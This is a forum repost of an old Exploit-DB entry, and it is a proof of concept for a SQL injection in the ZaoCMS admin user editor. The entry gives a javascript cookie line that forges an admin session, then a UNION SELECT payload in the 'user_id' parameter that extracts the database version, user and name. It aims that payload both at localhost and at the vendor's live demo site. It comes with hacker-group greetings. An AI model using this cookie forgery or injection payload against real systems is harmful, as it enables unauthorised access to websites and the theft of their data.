Exploit ZaoCMS - 'user_id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8769
Проверка EDB
  1. Пройдено
Автор
QABANDI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-05-22
Код:
                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait PEACE

=Vuln:		ZaoCMS - SQL Injection Vulnerability
=INFO:		http://zaocms.com/
=BUY:  		http://zaocms.com/
=DORK:		--


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
First we need to use the "Insecure cookiue handling" vulnerability, found at http://milw0rm.com/exploits/8763

You add the cookie, javascript:document.cookie="admin=stgAdmin;path=/";

then go to:
http://localhost/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--



LIVE DEMO:
http://demo.zaocms.com/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N

# milw0rm.com [2009-05-22]
 
Источник
www.exploit-db.com

Похожие темы